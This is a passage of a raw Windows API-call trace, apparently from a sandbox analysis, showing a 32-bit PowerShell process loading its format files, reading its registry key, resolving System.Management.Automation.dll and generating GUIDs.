[0050.324] GetLastError () returned 0x0 [0050.324] ReadFile (in: hFile=0x328, lpBuffer=0x2f88c9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f88c9c*, lpNumberOfBytesRead=0x19e504*=0x0, lpOverlapped=0x0) returned 1 [0050.324] GetLastError () returned 0x0 [0050.324] CloseHandle (hObject=0x328) returned 1 [0050.324] GetLastError () returned 0x0 [0050.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0050.324] GetLastError () returned 0x0 [0050.324] SetErrorMode (uMode=0x1) returned 0x1 [0050.325] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2fa9c98 | out: lpFileInformation=0x2fa9c98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0050.325] GetLastError () returned 0x0 [0050.325] SetErrorMode (uMode=0x1) returned 0x1 [0050.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0050.325] GetLastError () returned 0x0 [0050.325] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e488 | out: phkResult=0x19e488*=0x328) returned 0x0 [0050.325] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e4d0, lpData=0x0, lpcbData=0x19e4cc*=0x0 | out: lpType=0x19e4d0*=0x1, lpData=0x0, lpcbData=0x19e4cc*=0x56) returned 0x0 [0050.325] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e4d0, lpData=0x247300, lpcbData=0x19e4cc*=0x56 | out: lpType=0x19e4d0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x19e4cc*=0x56) returned 0x0 [0050.325] RegCloseKey (hKey=0x328) returned 0x0 [0050.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0050.325] GetLastError () returned 0x0 [0050.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19dfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0050.325] GetLastError () returned 0x0 [0050.329] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x7597add, Data2=0xd7a9, Data3=0x4b3a, Data4=([0]=0x9b, [1]=0x3c, [2]=0x42, [3]=0xcd, [4]=0x4b, [5]=0x53, [6]=0x5, [7]=0xd1))) returned 0x0 [0050.329] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x881aef1, Data2=0xd7ef, Data3=0x4d29, Data4=([0]=0xb1, [1]=0x3a, [2]=0xc9, [3]=0xf, [4]=0xf8, [5]=0x4e, [6]=0x76, [7]=0xe))) returned 0x0 [0050.329] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x391c3698, Data2=0x3d61, Data3=0x43cb, Data4=([0]=0x83, [1]=0x35, [2]=0xd6, [3]=0x3d, [4]=0x4f, [5]=0xef, [6]=0x65, [7]=0x24))) returned 0x0 [0050.329] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x6241c49f, Data2=0xb3cb, Data3=0x41cf, Data4=([0]=0xb3, [1]=0x20, [2]=0xab, [3]=0x19, [4]=0xbe, [5]=0x2d, [6]=0x41, [7]=0xec))) returned 0x0 [0050.329] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x309d9668, Data2=0xf9f8, Data3=0x4371, Data4=([0]=0xbd, [1]=0x48, [2]=0x62, [3]=0xa6, [4]=0xb0, [5]=0x7b, [6]=0x11, [7]=0xab))) returned 0x0 [0050.330] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x7b1ad34a, Data2=0xc8f2, Data3=0x45ea, Data4=([0]=0xa3, [1]=0xf5, [2]=0xae, [3]=0xa2, [4]=0xa1, [5]=0xdb, [6]=0xf9, [7]=0x3a))) returned 0x0 [0050.330] VirtualQuery (in: lpAddress=0x19d230, lpBuffer=0x19e230, dwLength=0x1c | out: lpBuffer=0x19e230*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.330] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xdc87ef70, Data2=0xe7a0, Data3=0x4628, Data4=([0]=0x92, [1]=0xc6, [2]=0x7d, [3]=0x40, [4]=0x69, [5]=0xe3, [6]=0xd5, [7]=0xe9))) returned 0x0 [0050.330] VirtualQuery (in: lpAddress=0x19d230, lpBuffer=0x19e230, dwLength=0x1c | out: lpBuffer=0x19e230*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.330] VirtualQuery (in: lpAddress=0x19d230, lpBuffer=0x19e230, dwLength=0x1c | out: lpBuffer=0x19e230*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.330] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xccae6543, Data2=0xe0e5, Data3=0x4aa9, Data4=([0]=0x81, [1]=0xa2, [2]=0xc, [3]=0xdb, [4]=0xdf, [5]=0x54, [6]=0xdc, [7]=0x28))) returned 0x0 [0050.331] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x1a92c1dd, Data2=0xda67, Data3=0x47b9, Data4=([0]=0x95, [1]=0x26, [2]=0xcf, [3]=0xeb, [4]=0xba, [5]=0x4d, [6]=0x82, [7]=0xcd))) returned 0x0 [0050.331] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xdb7e27e, Data2=0xad6f, Data3=0x4a37, Data4=([0]=0x86, [1]=0x78, [2]=0xd3, [3]=0x9f, [4]=0xde, [5]=0xf3, [6]=0x16, [7]=0x82))) returned 0x0 [0050.331] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xae21faaf, Data2=0x7711, Data3=0x4365, Data4=([0]=0xaf, [1]=0xf4, [2]=0x38, [3]=0x1b, [4]=0xd3, [5]=0xa9, [6]=0x7f, [7]=0xad))) returned 0x0 [0050.331] VirtualQuery (in: lpAddress=0x19d230, lpBuffer=0x19e230, dwLength=0x1c | out: lpBuffer=0x19e230*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.331] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xfb2ddd70, Data2=0xd0ba, Data3=0x4242, Data4=([0]=0x87, [1]=0xac, [2]=0xb8, [3]=0x76, [4]=0xd7, [5]=0xcc, [6]=0xb9, [7]=0xaa))) returned 0x0 [0050.332] VirtualQuery (in: lpAddress=0x19d230, lpBuffer=0x19e230, dwLength=0x1c | out: lpBuffer=0x19e230*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.332] VirtualQuery (in: lpAddress=0x19d230, lpBuffer=0x19e230, dwLength=0x1c | out: lpBuffer=0x19e230*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.332] VirtualQuery (in: lpAddress=0x19d230, lpBuffer=0x19e230, dwLength=0x1c | out: lpBuffer=0x19e230*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.333] VirtualQuery (in: lpAddress=0x19d230, lpBuffer=0x19e230, dwLength=0x1c | out: lpBuffer=0x19e230*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.333] VirtualQuery (in: lpAddress=0x19d230, lpBuffer=0x19e230, dwLength=0x1c | out: lpBuffer=0x19e230*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.334] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x3f949d96, Data2=0x2f25, Data3=0x423e, Data4=([0]=0x92, [1]=0x48, [2]=0xdf, [3]=0x2f, [4]=0xa1, [5]=0xcc, [6]=0x49, [7]=0xb0))) returned 0x0 [0050.334] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x8361baf2, Data2=0x5c57, Data3=0x420d, Data4=([0]=0xa7, [1]=0x34, [2]=0x29, [3]=0xbe, [4]=0x13, [5]=0x65, [6]=0x54, [7]=0xbd))) returned 0x0 [0050.334] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xd182698d, Data2=0x7aae, Data3=0x4c33, Data4=([0]=0xbf, [1]=0xc8, [2]=0x77, [3]=0x76, [4]=0x58, [5]=0x12, [6]=0x3d, [7]=0xdc))) returned 0x0 [0050.334] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x5657f110, Data2=0x3e5f, Data3=0x4bd1, Data4=([0]=0xb4, [1]=0x14, [2]=0xc, [3]=0xdf, [4]=0xae, [5]=0x8a, [6]=0x9, [7]=0xdb))) returned 0x0 [0050.334] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x3effb32b, Data2=0x3865, Data3=0x4c1e, Data4=([0]=0x8d, [1]=0xe1, [2]=0xdd, [3]=0x27, [4]=0x8e, [5]=0x39, [6]=0x51, [7]=0x40))) returned 0x0 [0050.334] VirtualQuery (in: lpAddress=0x19d384, lpBuffer=0x19e384, dwLength=0x1c | out: lpBuffer=0x19e384*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.334] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xf6b778b9, Data2=0x3c62, Data3=0x42e5, Data4=([0]=0xa0, [1]=0x25, [2]=0x53, [3]=0xc0, [4]=0x35, [5]=0x47, [6]=0x1d, [7]=0x6e))) returned 0x0 [0050.335] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x94173788, Data2=0x5641, Data3=0x4ffd, Data4=([0]=0x91, [1]=0xc5, [2]=0x5c, [3]=0x1a, [4]=0x42, [5]=0xa, [6]=0xb, [7]=0x28))) returned 0x0 [0050.335] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xd4665827, Data2=0x1dbc, Data3=0x4985, Data4=([0]=0x89, [1]=0x7c, [2]=0x13, [3]=0xe2, [4]=0xc9, [5]=0xd4, [6]=0x19, [7]=0x7b))) returned 0x0 [0050.335] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xe4cc606e, Data2=0x684, Data3=0x46ca, Data4=([0]=0xbd, [1]=0x7c, [2]=0x72, [3]=0xb4, [4]=0x13, [5]=0x63, [6]=0x9e, [7]=0xf2))) returned 0x0 [0050.335] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xe6059b4d, Data2=0x6249, Data3=0x49f1, Data4=([0]=0xae, [1]=0xdf, [2]=0x37, [3]=0xb4, [4]=0x9a, [5]=0xf8, [6]=0xe6, [7]=0x2f))) returned 0x0 [0050.335] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x7940fa5a, Data2=0x26b1, Data3=0x48a7, Data4=([0]=0x9a, [1]=0xc, [2]=0x94, [3]=0x96, [4]=0x1, [5]=0xdf, [6]=0x4b, [7]=0x0))) returned 0x0 [0050.336] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xbca893b0, Data2=0xbb2f, Data3=0x4266, Data4=([0]=0x96, [1]=0x54, [2]=0xa8, [3]=0xb2, [4]=0x66, [5]=0xde, [6]=0x94, [7]=0xd8))) returned 0x0 [0050.336] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xd3fb1cf7, Data2=0x3bb, Data3=0x4c55, Data4=([0]=0xba, [1]=0xf7, [2]=0x9f, [3]=0x5d, [4]=0x27, [5]=0xd0, [6]=0xf8, [7]=0x31))) returned 0x0 [0050.336] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x80468bf0, Data2=0x1f67, Data3=0x45c1, Data4=([0]=0xa9, [1]=0x3e, [2]=0xad, [3]=0x52, [4]=0xec, [5]=0x70, [6]=0x50, [7]=0x37))) returned 0x0 [0050.336] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x86f77b04, Data2=0xd2bb, Data3=0x4155, Data4=([0]=0xa3, [1]=0xd5, [2]=0x30, [3]=0x4f, [4]=0x60, [5]=0x59, [6]=0xf0, [7]=0xae))) returned 0x0 [0050.336] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xcabec052, Data2=0x7d36, Data3=0x445a, Data4=([0]=0x93, [1]=0xef, [2]=0xe, [3]=0x55, [4]=0xf1, [5]=0xa3, [6]=0x47, [7]=0x21))) returned 0x0 [0050.336] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xf35bba07, Data2=0xbf5e, Data3=0x409a, Data4=([0]=0xbc, [1]=0xd9, [2]=0xf5, [3]=0x56, [4]=0xef, [5]=0x1e, [6]=0x56, [7]=0x98))) returned 0x0 [0050.337] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xb44cb460, Data2=0xee93, Data3=0x49b8, Data4=([0]=0x9e, [1]=0x31, [2]=0x1, [3]=0x92, [4]=0xf4, [5]=0xe1, [6]=0xf2, [7]=0x48))) returned 0x0 [0050.337] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x9ebf3d82, Data2=0x9894, Data3=0x4f16, Data4=([0]=0xa8, [1]=0xa1, [2]=0xf5, [3]=0xea, [4]=0x1c, [5]=0x5c, [6]=0x80, [7]=0xc1))) returned 0x0 [0050.337] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xcca25a3c, Data2=0xc488, Data3=0x4082, Data4=([0]=0xbb, [1]=0xaf, [2]=0x9, [3]=0x24, [4]=0x33, [5]=0xcf, [6]=0x32, [7]=0x38))) returned 0x0 [0050.337] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x7a86dbc3, Data2=0xb487, Data3=0x4150, Data4=([0]=0x8f, [1]=0x5b, [2]=0xf1, [3]=0xec, [4]=0x62, [5]=0x5d, [6]=0x17, [7]=0x72))) returned 0x0 [0050.337] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xcdfed8c4, Data2=0x66d4, Data3=0x4293, Data4=([0]=0xba, [1]=0x8, [2]=0x2a, [3]=0x59, [4]=0xb8, [5]=0x51, [6]=0x31, [7]=0xb1))) returned 0x0 [0050.337] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x98213824, Data2=0x2bef, Data3=0x4fde, Data4=([0]=0xa4, [1]=0x7c, [2]=0x31, [3]=0x76, [4]=0xcf, [5]=0x84, [6]=0x17, [7]=0xcf))) returned 0x0 [0050.337] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x754aa6a5, Data2=0x230, Data3=0x470c, Data4=([0]=0x8e, [1]=0xa, [2]=0x86, [3]=0x37, [4]=0x98, [5]=0x32, [6]=0x78, [7]=0xed))) returned 0x0 [0050.338] VirtualQuery (in: lpAddress=0x19d230, lpBuffer=0x19e230, dwLength=0x1c | out: lpBuffer=0x19e230*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.338] VirtualQuery (in: lpAddress=0x19d230, lpBuffer=0x19e230, dwLength=0x1c | out: lpBuffer=0x19e230*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.340] VirtualQuery (in: lpAddress=0x19d230, lpBuffer=0x19e230, dwLength=0x1c | out: lpBuffer=0x19e230*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.341] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xdc06fb85, Data2=0x63c1, Data3=0x40f2, Data4=([0]=0x9b, [1]=0x60, [2]=0x9a, [3]=0xe9, [4]=0x3e, [5]=0x65, [6]=0x2, [7]=0xe))) returned 0x0 [0050.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19df9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0050.342] GetLastError () returned 0x0 [0050.342] SetErrorMode (uMode=0x1) returned 0x1 [0050.342] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0050.342] GetLastError () returned 0x0 [0050.342] GetFileType (hFile=0x328) returned 0x1 [0050.342] SetErrorMode (uMode=0x1) returned 0x1 [0050.342] GetFileType (hFile=0x328) returned 0x1 [0050.342] ReadFile (in: hFile=0x328, lpBuffer=0x3046b84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3046b84*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.343] GetLastError () returned 0x0 [0050.344] ReadFile (in: hFile=0x328, lpBuffer=0x3046b84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3046b84*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.344] GetLastError () returned 0x0 [0050.345] ReadFile (in: hFile=0x328, lpBuffer=0x3046b84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3046b84*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.345] GetLastError () returned 0x0 [0050.345] ReadFile (in: hFile=0x328, lpBuffer=0x3046b84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3046b84*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.345] GetLastError () returned 0x0 [0050.346] ReadFile (in: hFile=0x328, lpBuffer=0x3046b84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3046b84*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.346] GetLastError () returned 0x0 [0050.346] ReadFile (in: hFile=0x328, lpBuffer=0x3046b84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3046b84*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.346] GetLastError () returned 0x0 [0050.346] ReadFile (in: hFile=0x328, lpBuffer=0x3046b84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3046b84*, lpNumberOfBytesRead=0x19e504*=0x119, lpOverlapped=0x0) returned 1 [0050.346] GetLastError () returned 0x0 [0050.346] ReadFile (in: hFile=0x328, lpBuffer=0x3046b84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3046b84*, lpNumberOfBytesRead=0x19e504*=0x0, lpOverlapped=0x0) returned 1 [0050.346] GetLastError () returned 0x0 [0050.346] CloseHandle (hObject=0x328) returned 1 [0050.347] GetLastError () returned 0x0 [0050.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0050.347] GetLastError () returned 0x0 [0050.347] SetErrorMode (uMode=0x1) returned 0x1 [0050.347] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x3067b80 | out: lpFileInformation=0x3067b80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0050.347] GetLastError () returned 0x0 [0050.347] SetErrorMode (uMode=0x1) returned 0x1 [0050.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0050.347] GetLastError () returned 0x0 [0050.347] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e488 | out: phkResult=0x19e488*=0x328) returned 0x0 [0050.347] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e4d0, lpData=0x0, lpcbData=0x19e4cc*=0x0 | out: lpType=0x19e4d0*=0x1, lpData=0x0, lpcbData=0x19e4cc*=0x56) returned 0x0 [0050.347] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e4d0, lpData=0x247300, lpcbData=0x19e4cc*=0x56 | out: lpType=0x19e4d0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x19e4cc*=0x56) returned 0x0 [0050.347] RegCloseKey (hKey=0x328) returned 0x0 [0050.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0050.347] GetLastError () returned 0x0 [0050.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19dfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0050.348] GetLastError () returned 0x0 [0050.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.349] GetLastError () returned 0x0 [0050.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.349] GetLastError () returned 0x0 [0050.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.349] GetLastError () returned 0x0 [0050.349] VirtualQuery (in: lpAddress=0x19d1e0, lpBuffer=0x19e1e0, dwLength=0x1c | out: lpBuffer=0x19e1e0*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.349] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x45ef8c08, Data2=0x85b2, Data3=0x4285, Data4=([0]=0x87, [1]=0xb, [2]=0x54, [3]=0xc0, [4]=0xb9, [5]=0x46, [6]=0x9c, [7]=0x9f))) returned 0x0 [0050.349] VirtualQuery (in: lpAddress=0x19d230, lpBuffer=0x19e230, dwLength=0x1c | out: lpBuffer=0x19e230*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.350] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xfaa6acd6, Data2=0x8346, Data3=0x498b, Data4=([0]=0xa8, [1]=0x6c, [2]=0xe, [3]=0x2e, [4]=0x2b, [5]=0x3, [6]=0x7c, [7]=0x62))) returned 0x0 [0050.350] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xa7ad6540, Data2=0xb2c1, Data3=0x49a5, Data4=([0]=0xb3, [1]=0x21, [2]=0xeb, [3]=0x44, [4]=0x41, [5]=0x2f, [6]=0x6e, [7]=0xf8))) returned 0x0 [0050.350] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x852e771e, Data2=0x26de, Data3=0x48de, Data4=([0]=0x83, [1]=0xd0, [2]=0x72, [3]=0x48, [4]=0x43, [5]=0x27, [6]=0xc2, [7]=0xf4))) returned 0x0 [0050.350] VirtualQuery (in: 